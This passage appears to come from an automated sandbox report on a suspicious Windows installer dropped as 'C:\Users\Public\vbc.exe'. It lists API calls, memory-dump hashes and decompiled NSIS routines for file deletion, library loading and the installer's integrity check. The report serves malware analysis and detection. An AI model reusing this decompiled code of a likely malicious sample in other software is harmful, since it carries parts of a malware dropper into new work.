                                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                                          • ExitProcess.KERNEL32 ref: 0040345E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$"$"C:\Users\Public\vbc.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$psfiki Setup$~nsu.tmp
                                          • API String ID: 2278157092-1150292763
                                          • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                          • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                          • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                          • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				struct _WIN32_FIND_DATAA _v332;
                                          				signed int _t37;
                                          				char* _t49;
                                          				signed int _t52;
                                          				signed int _t55;
                                          				signed int _t61;
                                          				signed int _t63;
                                          				void* _t65;
                                          				signed int _t68;
                                          				CHAR* _t70;
                                          				CHAR* _t72;
                                          				char* _t75;
                                          
                                          				_t72 = _a4;
                                          				_t37 = E004054FF(__eflags, _t72);
                                          				_v12 = _t37;
                                          				if((_a8 & 0x00000008) != 0) {
                                          					_t63 = DeleteFileA(_t72); // executed
                                          					asm("sbb eax, eax");
                                          					_t65 =  ~_t63 + 1;
                                          					 *0x42ebe8 =  *0x42ebe8 + _t65;
                                          					return _t65;
                                          				}
                                          				_t68 = _a8 & 0x00000001;
                                          				__eflags = _t68;
                                          				_v8 = _t68;
                                          				if(_t68 == 0) {
                                          					L5:
                                          					E0040592B(0x42afe0, _t72);
                                          					__eflags = _t68;
                                          					if(_t68 == 0) {
                                          						E00405465(_t72);
                                          					} else {
                                          						lstrcatA(0x42afe0, "\*.*");
                                          					}
                                          					__eflags =  *_t72;
                                          					if( *_t72 != 0) {
                                          						L10:
                                          						lstrcatA(_t72, 0x40900c);
                                          						L11:
                                          						_t70 =  &(_t72[lstrlenA(_t72)]);
                                          						_t37 = FindFirstFileA(0x42afe0,  &_v332);
                                          						__eflags = _t37 - 0xffffffff;
                                          						_a4 = _t37;
                                          						if(_t37 == 0xffffffff) {
                                          							L29:
                                          							__eflags = _v8;
                                          							if(_v8 != 0) {
                                          								_t31 = _t70 - 1;
                                          								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                          								__eflags =  *_t31;
                                          							}
                                          							goto L31;
                                          						} else {
                                          							goto L12;
                                          						}
                                          						do {
                                          							L12:
                                          							_t75 =  &(_v332.cFileName);
                                          							_t49 = E00405449( &(_v332.cFileName), 0x3f);
                                          							__eflags =  *_t49;
                                          							if( *_t49 != 0) {
                                          								__eflags = _v332.cAlternateFileName;
                                          								if(_v332.cAlternateFileName != 0) {
                                          									_t75 =  &(_v332.cAlternateFileName);
                                          								}
                                          							}
                                          							__eflags =  *_t75 - 0x2e;
                                          							if( *_t75 != 0x2e) {
                                          								L19:
                                          								E0040592B(_t70, _t75);
                                          								__eflags = _v332.dwFileAttributes & 0x00000010;
                                          								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                          									E004055E3(_t72);
                                          									_t52 = DeleteFileA(_t72);
                                          									__eflags = _t52;
                                          									if(_t52 != 0) {
                                          										E00404CC9(0xfffffff2, _t72);
                                          									} else {
                                          										__eflags = _a8 & 0x00000004;
                                          										if((_a8 & 0x00000004) == 0) {
                                          											 *0x42ebe8 =  *0x42ebe8 + 1;
                                          										} else {
                                          											E00404CC9(0xfffffff1, _t72);
                                          											_push(0);
                                          											_push(_t72);
                                          											E00405679();
                                          										}
                                          									}
                                          								} else {
                                          									__eflags = (_a8 & 0x00000003) - 3;
                                          									if(__eflags == 0) {
                                          										E00405250(_t70, __eflags, _t72, _a8);
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          							_t61 =  *((intOrPtr*)(_t75 + 1));
                                          							__eflags = _t61;
                                          							if(_t61 == 0) {
                                          								goto L27;
                                          							}
                                          							__eflags = _t61 - 0x2e;
                                          							if(_t61 != 0x2e) {
                                          								goto L19;
                                          							}
                                          							__eflags =  *((char*)(_t75 + 2));
                                          							if( *((char*)(_t75 + 2)) == 0) {
                                          								goto L27;
                                          							}
                                          							goto L19;
                                          							L27:
                                          							_t55 = FindNextFileA(_a4,  &_v332);
                                          							__eflags = _t55;
                                          						} while (_t55 != 0);
                                          						_t37 = FindClose(_a4);
                                          						goto L29;
                                          					}
                                          					__eflags =  *0x42afe0 - 0x5c;
                                          					if( *0x42afe0 != 0x5c) {
                                          						goto L11;
                                          					}
                                          					goto L10;
                                          				} else {
                                          					__eflags = _t37;
                                          					if(_t37 == 0) {
                                          						L31:
                                          						__eflags = _v8;
                                          						if(_v8 == 0) {
                                          							L39:
                                          							return _t37;
                                          						}
                                          						__eflags = _v12;
                                          						if(_v12 != 0) {
                                          							_t37 = E00405C22(_t72);
                                          							__eflags = _t37;
                                          							if(_t37 == 0) {
                                          								goto L39;
                                          							}
                                          							E0040541E(_t72);
                                          							E004055E3(_t72);
                                          							_t37 = RemoveDirectoryA(_t72);
                                          							__eflags = _t37;
                                          							if(_t37 != 0) {
                                          								return E00404CC9(0xffffffe5, _t72);
                                          							}
                                          							__eflags = _a8 & 0x00000004;
                                          							if((_a8 & 0x00000004) == 0) {
                                          								goto L33;
                                          							}
                                          							E00404CC9(0xfffffff1, _t72);
                                          							_push(0);
                                          							_push(_t72);
                                          							return E00405679();
                                          						}
                                          						L33:
                                          						 *0x42ebe8 =  *0x42ebe8 + 1;
                                          						return _t37;
                                          					}
                                          					__eflags = _a8 & 0x00000002;
                                          					if((_a8 & 0x00000002) == 0) {
                                          						goto L31;
                                          					}
                                          					goto L5;
                                          				}
                                          			}


















                                          APIs
                                          • DeleteFileA.KERNEL32(?,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040526E
                                          • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 004052B8
                                          • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 004052D9
                                          • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 004052DF
                                          • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 004052F0
                                          • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                          • FindClose.KERNEL32(?), ref: 004053B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                          • API String ID: 2035342205-3287302484
                                          • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                          • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                                          • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                          • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405C49(signed int _a4) {
                                          				struct HINSTANCE__* _t5;
                                          				CHAR* _t7;
                                          				signed int _t9;
                                          
                                          				_t9 = _a4 << 3;
                                          				_t7 =  *(_t9 + 0x4091f8);
                                          				_t5 = GetModuleHandleA(_t7);
                                          				if(_t5 != 0) {
                                          					L2:
                                          					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
                                          				}
                                          				_t5 = LoadLibraryA(_t7); // executed
                                          				if(_t5 != 0) {
                                          					goto L2;
                                          				}
                                          				return _t5;
                                          			}







                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                          • LoadLibraryA.KERNEL32(?), ref: 00405C66
                                          • GetProcAddress.KERNEL32(00000000,?,?,00000000,00403126,00000008), ref: 00405C77
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                          • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                                          • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                          • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405C22(CHAR* _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
                                          				if(_t2 == 0xffffffff) {
                                          					return 0;
                                          				}
                                          				FindClose(_t2);
                                          				return 0x42c028;
                                          			}





                                          APIs
                                          • FindFirstFileA.KERNEL32(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 00405C2D
                                          • FindClose.KERNEL32(00000000), ref: 00405C39
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                          • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                                          • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                          • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,11E1A300,00003000,00000004), ref: 1000C146
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: AllocVirtual
                                          • API String ID: 4275171209-2653676799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E00403489() {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				int _v12;
                                          				int _v16;
                                          				char _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t20;
                                          				signed int _t24;
                                          				void* _t28;
                                          				void* _t30;
                                          				int _t31;
                                          				void* _t34;
                                          				struct HINSTANCE__* _t37;
                                          				int _t38;
                                          				intOrPtr _t39;
                                          				int _t42;
                                          				intOrPtr _t59;
                                          				char _t61;
                                          				CHAR* _t63;
                                          				signed char _t67;
                                          				struct HINSTANCE__* _t75;
                                          				CHAR* _t78;
                                          				intOrPtr _t80;
                                          				CHAR* _t85;
                                          
                                          				_t80 =  *0x42eb70; // 0x2903c0
                                          				_t20 = E00405C49(6);
                                          				_t87 = _t20;
                                          				if(_t20 == 0) {
                                          					_t78 = 0x429fd8;
                                          					"1033" = 0x7830;
                                          					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
                                          					__eflags =  *0x429fd8;
                                          					if(__eflags == 0) {
                                          						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
                                          					}
                                          					lstrcatA("1033", _t78);
                                          				} else {
                                          					E00405889("1033",  *_t20() & 0x0000ffff);
                                          				}
                                          				E0040373D(_t75, _t87);
                                          				_t24 =  *0x42eb78; // 0x80
                                          				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
                                          				 *0x42ebe0 = _t24 & 0x00000020;
                                          				if(E004054FF(_t87, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
                                          					L16:
                                          					if(E004054FF(_t95, _t84) == 0) {
                                          						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                                          					}
                                          					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040);
                                          					 *0x42e348 = _t28;
                                          					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                          						L21:
                                          						if(E0040140B(0) == 0) {
                                          							_t30 = E0040373D(_t75, __eflags);
                                          							__eflags =  *0x42ec00; // 0x0
                                          							if(__eflags != 0) {
                                          								_t31 = E00404D9B(_t30, 0);
                                          								__eflags = _t31;
                                          								if(_t31 == 0) {
                                          									E0040140B(1);
                                          									goto L33;
                                          								}
                                          								__eflags =  *0x42e32c; // 0x0
                                          								if(__eflags == 0) {
                                          									E0040140B(2);
                                          								}
                                          								goto L22;
                                          							}
                                          							ShowWindow( *0x429fb0, 5); // executed
                                          							_t37 = LoadLibraryA("RichEd20"); // executed
                                          							__eflags = _t37;
                                          							if(_t37 == 0) {
                                          								LoadLibraryA("RichEd32");
                                          							}
                                          							_t85 = "RichEdit20A";
                                          							_t38 = GetClassInfoA(0, _t85, 0x42e300);
                                          							__eflags = _t38;
                                          							if(_t38 == 0) {
                                          								GetClassInfoA(0, "RichEdit", 0x42e300);
                                          								 *0x42e324 = _t85;
                                          								RegisterClassA(0x42e300);
                                          							}
                                          							_t39 =  *0x42e340; // 0x0
                                          							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
                                          							E0040140B(5);
                                          							return _t42;
                                          						}
                                          						L22:
                                          						_t34 = 2;
                                          						return _t34;
                                          					} else {
                                          						_t75 =  *0x42eb60; // 0x400000
                                          						 *0x42e314 = _t28;
                                          						_v20 = 0x624e5f;
                                          						 *0x42e304 = E00401000;
                                          						 *0x42e310 = _t75;
                                          						 *0x42e324 =  &_v20;
                                          						if(RegisterClassA(0x42e300) == 0) {
                                          							L33:
                                          							__eflags = 0;
                                          							return 0;
                                          						}
                                          						_t12 =  &_v16; // 0x624e5f
                                          						SystemParametersInfoA(0x30, 0, _t12, 0);
                                          						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
                                          						goto L21;
                                          					}
                                          				} else {
                                          					_t75 =  *(_t80 + 0x48);
                                          					if(_t75 == 0) {
                                          						goto L16;
                                          					}
                                          					_t59 =  *0x42eb98; // 0x2939c0
                                          					_t78 = 0x42db00;
                                          					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
                                          					_t61 =  *0x42db00; // 0x68
                                          					if(_t61 == 0) {
                                          						goto L16;
                                          					}
                                          					if(_t61 == 0x22) {
                                          						_t78 = 0x42db01;
                                          						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
                                          					}
                                          					_t63 = lstrlenA(_t78) + _t78 - 4;
                                          					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                                          						L15:
                                          						E0040592B(_t84, E0040541E(_t78));
                                          						goto L16;
                                          					} else {
                                          						_t67 = GetFileAttributesA(_t78);
                                          						if(_t67 == 0xffffffff) {
                                          							L14:
                                          							E00405465(_t78);
                                          							goto L15;
                                          						}
                                          						_t95 = _t67 & 0x00000010;
                                          						if((_t67 & 0x00000010) != 0) {
                                          							goto L15;
                                          						}
                                          						goto L14;
                                          					}
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                            • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?), ref: 00405C66
                                            • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403126,00000008), ref: 00405C77
                                          • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\Public\vbc.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                          • lstrlenA.KERNEL32(hnahgvbse,?,?,?,hnahgvbse,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\Public\vbc.exe" ), ref: 00403565
                                          • lstrcmpiA.KERNEL32(?,.exe,hnahgvbse,?,?,?,hnahgvbse,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                          • GetFileAttributesA.KERNEL32(hnahgvbse), ref: 00403583
                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 004035CC
                                            • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                          • RegisterClassA.USER32 ref: 00403613
                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                          • CreateWindowExA.USER32 ref: 00403664
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                          • LoadLibraryA.KERNEL32(RichEd20), ref: 004036A7
                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042E300), ref: 004036C2
                                          • GetClassInfoA.USER32(00000000,RichEdit,0042E300), ref: 004036CF
                                          • RegisterClassA.USER32(0042E300), ref: 004036D8
                                          • DialogBoxParamA.USER32 ref: 004036F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$hnahgvbse
                                          • API String ID: 914957316-1531098974
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E00402C0B(void* __eflags, signed int _a4) {
                                          				DWORD* _v8;
                                          				DWORD* _v12;
                                          				void* _v16;
                                          				intOrPtr _v20;
                                          				long _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				long _t43;
                                          				signed int _t50;
                                          				void* _t53;
                                          				signed int _t54;
                                          				void* _t57;
                                          				intOrPtr* _t59;
                                          				long _t60;
                                          				signed int _t65;
                                          				signed int _t67;
                                          				signed int _t70;
                                          				signed int _t71;
                                          				signed int _t77;
                                          				intOrPtr _t80;
                                          				long _t82;
                                          				signed int _t85;
                                          				signed int _t87;
                                          				void* _t89;
                                          				signed int _t90;
                                          				signed int _t93;
                                          				void* _t94;
                                          
                                          				_t82 = 0;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				_t43 = GetTickCount();
                                          				_t91 = "C:\\Users\\Public\\vbc.exe";
                                          				 *0x42eb6c = _t43 + 0x3e8;
                                          				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
                                          				_t89 = E00405602(_t91, 0x80000000, 3);
                                          				_v16 = _t89;
                                          				 *0x409010 = _t89;
                                          				if(_t89 == 0xffffffff) {
                                          					return "Error launching installer";
                                          				}
                                          				_t92 = "C:\\Users\\Public";
                                          				E0040592B("C:\\Users\\Public", _t91);
                                          				E0040592B(0x436000, E00405465(_t92));
                                          				_t50 = GetFileSize(_t89, 0);
                                          				__eflags = _t50;
                                          				 *0x428b88 = _t50;
                                          				_t93 = _t50;
                                          				if(_t50 <= 0) {
                                          					L24:
                                          					E00402BB0(1);
                                          					__eflags =  *0x42eb74 - _t82; // 0x31a00
                                          					if(__eflags == 0) {
                                          						goto L29;
                                          					}
                                          					__eflags = _v8 - _t82;
                                          					if(_v8 == _t82) {
                                          						L28:
                                          						_t53 = GlobalAlloc(0x40, _v24); // executed
                                          						_t94 = _t53;
                                          						_t54 =  *0x42eb74; // 0x31a00
                                          						E00403098(_t54 + 0x1c);
                                          						_push(_v24);
                                          						_push(_t94);
                                          						_push(_t82);
                                          						_push(0xffffffff);
                                          						_t57 = E00402E44();
                                          						__eflags = _t57 - _v24;
                                          						if(_t57 == _v24) {
                                          							__eflags = _v44 & 0x00000001;
                                          							 *0x42eb70 = _t94;
                                          							 *0x42eb78 =  *_t94;
                                          							if((_v44 & 0x00000001) != 0) {
                                          								 *0x42eb7c =  *0x42eb7c + 1;
                                          								__eflags =  *0x42eb7c;
                                          							}
                                          							_t40 = _t94 + 0x44; // 0x44
                                          							_t59 = _t40;
                                          							_t85 = 8;
                                          							do {
                                          								_t59 = _t59 - 8;
                                          								 *_t59 =  *_t59 + _t94;
                                          								_t85 = _t85 - 1;
                                          								__eflags = _t85;
                                          							} while (_t85 != 0);
                                          							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                          							 *(_t94 + 0x3c) = _t60;
                                          							E004055C3(0x42eb80, _t94 + 4, 0x40);
                                          							__eflags = 0;
                                          							return 0;
                                          						}
                                          						goto L29;
                                          					}
                                          					E00403098( *0x414b78);
                                          					_t65 = E00403066( &_a4, 4); // executed
                                          					__eflags = _t65;
                                          					if(_t65 == 0) {
                                          						goto L29;
                                          					}
                                          					__eflags = _v12 - _a4;
                                          					if(_v12 != _a4) {
                                          						goto L29;
                                          					}
                                          					goto L28;
                                          				} else {
                                          					do {
                                          						_t67 =  *0x42eb74; // 0x31a00
                                          						_t90 = _t93;
                                          						asm("sbb eax, eax");
                                          						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                          						__eflags = _t93 - _t70;
                                          						if(_t93 >= _t70) {
                                          							_t90 = _t70;
                                          						}
                                          						_t71 = E00403066(0x420b88, _t90); // executed
                                          						__eflags = _t71;
                                          						if(_t71 == 0) {
                                          							E00402BB0(1);
                                          							L29:
                                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                          						}
                                          						__eflags =  *0x42eb74;
                                          						if( *0x42eb74 != 0) {
                                          							__eflags = _a4 & 0x00000002;
                                          							if((_a4 & 0x00000002) == 0) {
                                          								E00402BB0(0);
                                          							}
                                          							goto L20;
                                          						}
                                          						E004055C3( &_v44, 0x420b88, 0x1c);
                                          						_t77 = _v44;
                                          						__eflags = _t77 & 0xfffffff0;
                                          						if((_t77 & 0xfffffff0) != 0) {
                                          							goto L20;
                                          						}
                                          						__eflags = _v40 - 0xdeadbeef;
                                          						if(_v40 != 0xdeadbeef) {
                                          							goto L20;
                                          						}
                                          						__eflags = _v28 - 0x74736e49;
                                          						if(_v28 != 0x74736e49) {
                                          							goto L20;
                                          						}
                                          						__eflags = _v32 - 0x74666f73;
                                          						if(_v32 != 0x74666f73) {
                                          							goto L20;
                                          						}
                                          						__eflags = _v36 - 0x6c6c754e;
                                          						if(_v36 != 0x6c6c754e) {
                                          							goto L20;
                                          						}
                                          						_a4 = _a4 | _t77;
                                          						_t87 =  *0x414b78; // 0x7431a
                                          						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
                                          						_t80 = _v20;
                                          						__eflags = _t80 - _t93;
                                          						 *0x42eb74 = _t87;
                                          						if(_t80 > _t93) {
                                          							goto L29;
                                          						}
                                          						__eflags = _a4 & 0x00000008;
                                          						if((_a4 & 0x00000008) != 0) {
                                          							L16:
                                          							_v8 = _v8 + 1;
                                          							_t24 = _t80 - 4; // 0x409154
                                          							_t93 = _t24;
                                          							__eflags = _t90 - _t93;
                                          							if(_t90 > _t93) {
                                          								_t90 = _t93;
                                          							}
                                          							goto L20;
                                          						}
                                          						__eflags = _a4 & 0x00000004;
                                          						if((_a4 & 0x00000004) != 0) {
                                          							break;
                                          						}
                                          						goto L16;
                                          						L20:
                                          						__eflags = _t93 -  *0x428b88; // 0x7431e
                                          						if(__eflags < 0) {
                                          							_v12 = E00405CB5(_v12, 0x420b88, _t90);
                                          						}
                                          						 *0x414b78 =  *0x414b78 + _t90;
                                          						_t93 = _t93 - _t90;
                                          						__eflags = _t93;
                                          					} while (_t93 > 0);
                                          					_t82 = 0;
                                          					__eflags = 0;
                                          					goto L24;
                                          				}
                                          			}


































                                          APIs
                                          • GetTickCount.KERNEL32("C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 00402C1C
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C38
                                            • Part of subcall function 00405602: GetFileAttributesA.KERNEL32(00000003,00402C4B,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405606
                                            • Part of subcall function 00405602: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                          • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402C84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
